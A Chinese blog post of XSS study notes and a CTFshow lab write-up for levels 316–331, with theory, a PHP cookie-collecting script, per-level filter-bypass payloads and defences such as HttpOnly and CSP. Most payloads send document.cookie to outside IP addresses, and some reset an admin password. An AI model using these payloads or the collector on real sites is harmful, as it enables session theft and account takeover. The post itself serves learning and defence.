XSS学习笔记(一)、CTFSHOW-316到331关卡绕过WP

已于 2022-10-30 14:53:05 修改
阅读量1.5k 收藏 3
点赞数
分类专栏: 基础的渗透测试 文章标签: xss 学习 网络
于 2022-10-28 20:05:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/127578086
版权

#知识点:

1、XSS跨站-过滤绕过-便签&语句&符号等

2、XSS跨站-修复方案-CSP&函数&http_only等

1、原理

指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。

-数据交互的地方

get、post、headers

反馈与浏览

富文本编辑器

各类标签插入和自定义

-数据输出的地方

用户资料

关键词、标签、说明

文件上传

2、分类

反射型(非持久型)

存储型(持久型)

DOM型

mXSS(突变型XSS)

UXSS(通用型xss)

Flash XSS

UTF-7 XSS

MHTML XSS

CSS XSS

VBScript XSS

3、危害

网络钓鱼,包括获取各类用户账号;

窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份对网站执行操作;

劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;

强制弹出广告页面、刷流量等;

网页挂马;

进行恶意操作,如任意篡改页面信息、删除文章等;

进行大量的客户端攻击,如ddos等;

获取客户端信息,如用户的浏览历史、真实ip、开放端口等;

控制受害者机器向其他网站发起攻击;

结合其他漏洞,如csrf,实施进一步危害;

提升用户权限,包括进一步渗透网站;

传播跨站脚本蠕虫等

4、修复

1、过滤一些危险字符

2、HTTP-only Cookie

3、设置CSP(Content Security Policy)

4、输入内容长度限制,转义等

#XSS跨站系列内容:

1、XSS跨站-原理&分类&手法

2、XSS跨站-探针&利用&审计

3、XSS跨站-另类攻击手法利用

4、XSS跨站-防御修复&绕过策略

#实践

服务器准备一个文件,接受cookie get.php

<?php

$cookie=$_GET['c'];

$myfile=fopen("cookie.txt","w+");

fwrite($myfile,$cookie);

fclose($myfile);

?>

xss语句:<script>window.location.href='http://HOST/get.php?c='+document.cookiie</script>

<script>window.location.href='http://43.143.199.133:8081/get.php?c=' document.cookie</script>

js功能中获取cookie:document.cookie

https://ctf.show/

  • XSS绕过-CTFSHOW-316到331关卡绕过WP

  • XSS修复-过滤函数&http_only&CSP&长度限制

#XSS绕过-CTFSHOW-361到331关卡绕过WP

绕过:https://xz.aliyun.com/t/4067

316-反射型-直接远程调用

<script>window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie</script>

317-反射型-过滤<script>

<img src=1 onerror=window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie;>

318 319-反射型-过滤<img>

<svg onload="window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie;">

320-326-反射型-过滤空格

<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

327-存储型-无过滤

<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

328-存储型-注册插入JS

<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

329-存储型-失效凭据需1步完成所需操作

<script>

$('.laytable-cell-1-0-1').each(function(index,value){

if(value.innerHTML.indexOf('ctf'+'show')>-1){

window.location.href='http://47.94.236.117/get.php?c='+value.innerHTML;

}

});

</script>

330-存储型-借助修改密码重置管理员密码(GET)

<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

331-存储型-借助修改密码重置管理员密码(POST)

<script>$.ajax({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});</script>

#XSS修复-过滤函数&http_only&CSP&长度限制

1、过滤一些危险字符,以及转义& < > " ' 等危险字符

自定义过滤函数引用

2、HTTP-only Cookie

https://www.php.cn/php-ask-457831.html

php.ini设置或代码引用

php.ini配置文件中引用:session.cookie_httponly =1

代码中引用:ini_set("session.cookie_httponly", 1);

3、设置CSP(Content Security Policy)

https://blog.csdn.net/a1766855068/article/details/89370320

header("Content-Security-Policy:img-src 'self' ");

4、输入内容长度限制,实体转义等

xss绕过总结

1.大小写绕过

注意在html里不区分大小写 所以标签如果别过滤 可以采用大小写绕过的方式

代码如下(示例):

<script>alert(“xss”);</script>

<ScRipt>ALeRt(“XSS”);</sCRipT>

2.空格/回车(换行符)/Tab

当过滤掉了Javascript等敏感字符串时就对字符串进行添加空格,换行或tab,此处利用js自身的性质:js通常用分号结尾,当解析到完整语句并且行尾存在换行符的情况下就可以忽略掉分号,若解析确定不是完整语句,则会继续处理,直到语句结束或出现分号。

例如下列语句,我们利用空格将语句分隔成了两部分,解析引擎解析确定到的不是完整的语句,JavaScript则会继续进行处理直到这个语句结束,利用换行符和tab同理

代码如下(示例):

<img src="java  script:alert(‘xss‘);" width=100>

或者

<img src="javascript: alert(‘xss‘);" width=100>

1.<img>

payload:<img src=1 οnerrοr=alert("xss");> //如果找不到图片1,报错

2.<input>

payload: <input οnfοcus="alert('xss');">

<input οnblur=alert("xss") autofocus><input autofocus> #竞争焦点,触发onblur事件

<input οnfοcus="alert('xss');" autofocus> #通过autofocus属性执行本身的focus事件

3.<details>

payload: <details οntοggle="alert('xss');">

<details open οntοggle="alert('xss');"> #使用open属性触发ontoggle事件

4.<svg>

payload: <svg οnlοad=alert("xss");>

5.<iframe>

payload: <iframe οnlοad=alert("xss");></iframe>

6.<body>

payload: <body/οnlοad=alert("xss");>

事件描述

onclick 在用户使用鼠标左键点击对象时触发

ondblclick 用户双击对象时触发

onmousedown 用户用任何鼠标按键单击对象时触发

onmouseenter/onmouseover 用户将鼠标指针移动到对象内时触发

onmouseleave/onmouseout 用户将鼠标移出对象边界时触发

onmousemove 用户将鼠标划过对象时触发

onmouseup 用户在鼠标位于对象之上时释放鼠标按钮触发

onmousewheel 鼠标滚轮按钮旋转时触发

onpaste 用户粘贴数据以便从剪切板向文档传输数据在目标对象上时触发

onpropertychange 在对象上发生对象属性更改时触发

onkeydown 用户按下键盘按键时触发

onerror 装载文档或图像的过程中发生错误时触发

onload 加载完毕自动触发

大飞先生
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
第十二节 XSS 过滤器绕过-01
09-15
第十二节 XSS 过滤器绕过-01
ctfshow-web[XSS]
m0_72898152的博客
02-04 725
ctfshow
xss--ctf,绕过,修复
2303_79592445的博客
03-12 602
发现多了一个修改密码,当我处于登录状态,去修改这个密码,然后抓个包,就会发现,它回去访问这个网站,它会随着url的改变而改变。用这种比较好,因为他不会自动跳转到那个修改密码的地址,之前的那个,当管理员打开那个数据库,就会直接跳转,就可能被发现。当我们将这个跳转代码写到上面,就会让它自动跳转到这个修改密码的网站,就可以达到修改密码的目的。(123是密码,以前是get直接访问就行,所有我们就需要js语句来实现post直接提交)密码改成js语句,然后后台访问数据库,就会获取管理员的 cookie。
CTFSHOW XSS漏洞
qq_61553520的博客
04-20 256
这篇文章记录了我刷题的过程,是ctf.show上的XSS漏洞,第316-第333。
CTF show XSS
small_whitehat的博客
02-24 106
CTF show XSS
CTF [网络安全实验室] [脚本关]
热门推荐
weixin_45253622的博客
05-04 1万+
脚本关 1.key又又找不到了? emmmm 抓包放包key就出来了,和基础关的差不多。 2.快速口算 试着写下脚本: # -*- codeing = utf-8 -*- # @Time : 2021/5/4 10:46 # @Author : rexu # @File : 2sadd.py # @Software : PyCharm import requests,re s = requests.Session() url = "http://lab1.xseclab.com/xss
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 631
2023/05/07 ctfshow刷题 web316-326 反射型XSS
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 3522
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
CTFshow web入门 web316-web333 XSS
qq_56815564的博客
07-05 1279
我tm又来了,总之top10先过一遍,到第三个XSS了,下一个要去看了,看了网上很多wp总感觉不是太全,所以就自己写了一个网站没有对用户提交的数据进行转义处理或者过滤不足,从而被恶意攻击者利用进而被添加一些恶意可执行脚本嵌入到web页面中去,使别的用户访问都会执行相应的嵌入代码。
ctfshow-web-xss
qq_60905276的博客
01-22 497
1.web316 直接简单的测试一下 <script>alert("hack")</script> 发现并没有防护,直接开整。 (做xss-labs-master魔怔了,愣是不知道flag在哪,看别人才知道flag在cookie那里) 好,我们开个项目直接做。 轻松解决。 网站在下面XSS Platformhttp://xsscom.com/ 2.web317 又是一波测试,发现它把<script>标签过滤了。 那我们就用svg的,..
ctfshow XSS漏洞web316-328
m0_62584974的博客
04-07 1706
2022/4/7 Web316 XSS 反射性XSS 圣诞快乐,写下祝福语,生成链接,发送给朋友,可以领取十个鸡蛋! CEYE - Monitor service for security testing 先在这个网站注册一个账号获得一个临时的域名 红框内的是临时的域名 然后在方框中输入: <script>varimg=document.createElement("img");img.src="http://你的ceye地址/"+document.co..
xss-filter-spring-boot-starter:springboot自动xss
05-17
xss-filter-spring-boot-starter springboot自动xss 使用方法在项目的pom.xml中加入依赖即口 <groupId>com.djk</groupId> <artifactId>xss-filter-spring-boot-starter <version>0.0.1 目前支持3种入参数xss...
AngularJS学习笔记之ng-options指令
12-29
1.基本下拉效果(lable for value in array)  其中select标签中的ng-model属性必须有,其值为选中的对象或属性值。 <div ng-controller=ngselect> ... <option xss=removed>-- 请选择 -- </select> m
第十一节 绕过替换script和on事件的XSS-01
09-15
第十一节 绕过替换script和on事件的XSS-01
xss跨站脚本攻击-运维安全详细笔记
06-30
xss跨站脚本攻击-运维安全详细笔记
什么是 XSS 攻击?
m0_38066007的博客
04-23 63
XSS 攻击指的是跨站脚本攻击,是一种代码注入攻击。攻击者通过在网站注入恶意脚本,使之在用户的浏览器上运行,从而盗取用户的信息如 cookie 等。XSS 的本质是因为网站没有对恶意代码进行过滤,与正常的代码混合在一起了,浏览器没有办法分辨哪些脚本是可信的,从而导致了恶意代码的执行。
pikachu-xss
最新发布
2303_81631620的博客
04-23 300
按原本的做法,应该先写一个script标签测试一下,但是发现有字符限制。
Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识
JINGWHALE
04-22 892
本文介绍了Web前端安全问题分类综合以及XSS、CSRF、SQL注入、DoS/DDoS攻击、会话劫持、点击劫持等详解,增强生产安全意识。Web前端作为与用户直接交互的界面,其安全性问题直接关系到用户体验和数据安全。近年来,随着前端技术的快速发展,Web前端安全问题也日益凸显。因此,加强生产安全意识,深入理解并防范前端安全问题,对于保障整个Web应用的安全性至关重要。
XSS-跨站脚本攻击 漏洞详解
m0_69043895的博客
04-20 955
XSS全称跨站脚本(Cross Site Scripting),为避免与层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故缩写为XSS。这是一种将任意 Javascript 代码插入到其他Web用户页面里执行以达到攻击目的的漏洞。攻击者利用浏览器的动态展示数据功能,在HTML页面里嵌入恶意代码。当用户浏览改页时,这些潜入在HTML中的恶意代码会被执行,用户浏览器被攻击者控制,从而达到攻击者的特殊目的,如 cookie窃取等。
ctfshow-web-web红包题
07-14
我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值